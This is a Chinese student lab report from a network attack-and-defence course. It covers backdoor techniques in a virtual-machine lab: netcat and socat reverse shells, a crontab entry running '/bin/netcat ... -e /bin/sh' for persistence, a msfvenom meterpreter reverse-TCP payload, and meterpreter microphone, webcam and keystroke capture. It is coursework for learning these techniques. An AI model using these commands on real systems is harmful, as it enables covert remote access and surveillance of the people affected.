2017-2018-2 20155230《网络对抗技术》实验2:后门原理与实践

常用后门工具

任务一:Windows获得Linux的Shell

  • 1.获取Windows的IP地址
    1071497-20180402162548006-1069627750.png

  • 2.windows 打开监听
    进入ncat程序所在文件夹,运行并监听Windows端口
    1071497-20180402162621158-1722903432.png

  • 3.Linux反弹连接win
    1071497-20180402162817607-1907374289.png

  • 4.windows下获得一个linux shell,可运行任何指令,如ls
    1071497-20180402162838444-1140318466.png

任务二:Linux获得Win Shell

  • 1.获取Linux的IP地址
    1071497-20180402163154839-683222088.png

  • 2.Linux运行监听指令
    1071497-20180402163400121-64853670.png

  • 3.Windows反弹连接Linux
    这一步,在主机的Windows系统下一直提示连接失败和超时。刚开始是以为放在了systerm32文件夹下可能没有权限所以超时,但是换了ncat的存储位置之后依然不行;然后猜测是不是网络问题,果然!虽然Linux能Ping通Windows,但是Windows并不能Ping Linux,意识到可能是防火墙未关闭的原因,但是没敢关主机的防火墙,所以去暗搓搓的开了Win7 虚拟机,问题解决。(但是,是不是防火墙问题也不敢下定论,上节课开了小差也不知道老师有没有说这个问题,好慌啊。。。
    1071497-20180402183355713-1762955799.png

  • 4.Linux下看到Windows的命令提示!
    1071497-20180402182515834-382747560.png

任务三:使用nc传输数据

  • 1、Windows下监听5230端口:
    1071497-20180402183032251-1634357585.png

  • 2、Kali下连接到Windows的5230端口:
    1071497-20180402183048210-1095165779.png

  • 3、建立连接之后,就可以传输数据了:
    1071497-20180402183106842-261194028.png
    1071497-20180402183124700-1557207050.png


Meterpreter

任务一:使用netcat获取主机操作Shell,cron启动

  • 1、在Windows系统下,监听5230端口:
    1071497-20180402185336400-852005337.png

  • 2、用crontab -e指令编辑一条定时任务
    在最后一行添加52 * * * * /bin/netcat 192.168.222.131 5230 -e /bin/sh,意思是在每个小时的第52分钟反向连接Windows7虚拟机的5230端口:
    1071497-20180402185517001-1521335364.png

  • 3、当时间到了17点45时,此时已经获得了Kali的shell,可以输入指令:
    1071497-20180402185532148-734066891.png

任务二:使用socat获取主机操作Shell, 任务计划启动

  • 1、在windows7系统下,按下微软开始键,选择控制面板,打开管理工具→任务计划程序,在任务计划程序创建任务,填写任务名称,并新建一个触发器。
    1071497-20180402192018797-368663810.png

  • 2、在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5230 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5230,同时把cmd.exe的stderr重定向到stdout上:
    1071497-20180402191949599-301139223.png

  • 3、手动运行这个任务,此时,在Kali环境下输入指令socat - tcp:172.30.4.253:5230,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5230端口,此时可以发现已经成功获得了一个cmd shell:
    1071497-20180402193235218-1773322407.png

任务三:使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 1、输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.222.131 LPORT=5230 -f exe > 20155230_backdoor.exe生成后门程序:
    1071497-20180402194925457-697029213.png

  • 2、通过nc指令将生成的后门程序传送到Windows主机上:
    1071497-20180402195054416-298519890.png
    1071497-20180402195104001-1725916099.png

  • 3、在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
    1071497-20180402195651177-609183742.png
    1071497-20180402195719603-2061912303.png

  • 4、设置完成后,执行监听:
    1071497-20180402202140556-1560818423.png

  • 5、运行Windows下的后门程序:
    1071497-20180402202151222-824994415.png

  • 6、此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
    1071497-20180402202227664-1226905814.png

任务四:使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

  • 1、使用record_mic指令可以截获一段音频:
    1071497-20180402214954142-1437799050.png

  • 2、使用webcam_snap指令可以使用摄像头进行拍照
    1071497-20180402215426380-1520250085.png
    啊,百度不到1411错误是什么,自己猜测是虚拟机无法调用摄像头,然后试了诸如在主机服务列表下重启虚拟机的某项服务没有解决好,猜测是百度到win10最初没有摄像头驱动而我当初升级win10的时候过早,有可能没有安装驱动,又去装了摄像头驱动,依然出错,然后在官方教程里发现,我的摄像头应该是坏了,打开qq和自己视频聊天也是报检测不到摄像头。

  • 3、使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
    1071497-20180402203051969-742564455.png


实验感想

出了很多幺蛾子,很绝望。做完之后大脑一片空白,看实验指导书一定要慢慢的看啊!渗透测试做的后门程序反弹ip居然写了windows自己,还抓狂了很久。初步学习了msf的使用,虽然跟着指导书做完了,但是对于socat还是很懵逼,怎么做到的一无所知,还需要好好学习啊。。

转载于:https://www.cnblogs.com/J1n233/p/8694884.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值